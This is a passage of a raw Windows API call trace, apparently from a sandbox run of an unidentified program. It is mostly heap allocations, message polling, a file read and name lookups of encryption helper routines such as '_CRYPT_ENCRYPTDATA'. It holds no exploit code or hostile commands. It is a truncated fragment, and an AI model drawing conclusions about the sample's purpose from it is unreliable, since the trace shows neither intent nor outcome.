lpMsg=0x61ee24) returned 0 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0076.364] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0076.364] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.365] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.365] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100000) returned 0x32b0020 [0076.365] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0076.366] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x8577, lpOverlapped=0x0) returned 1 [0076.367] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0076.367] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.367] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8577) returned 0x6a1f38 [0076.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0076.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.369] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.369] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.369] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.369] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.369] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8577) returned 0x795ff8 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.371] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8577) returned 0x6a1f38 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.371] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.371] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.371] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0076.372] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.372] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb4e8 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8577) returned 0x6a1f38 [0076.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3d8 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.372] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3b8 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0076.372] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0076.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb428 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.373] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ac70 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8577) returned 0x79e578 [0076.373] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0076.374] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.374] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0076.374] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.374] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0076.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0076.375] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb4f8 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0076.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e120 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.375] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0076.375] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0076.376] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.376] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.376] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0076.376] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0076.377] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.377] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0076.377] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.378] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0076.378] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0076.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e498 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0076.379] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0076.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.379] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.379] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0076.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.380] RtlAllocateHeap 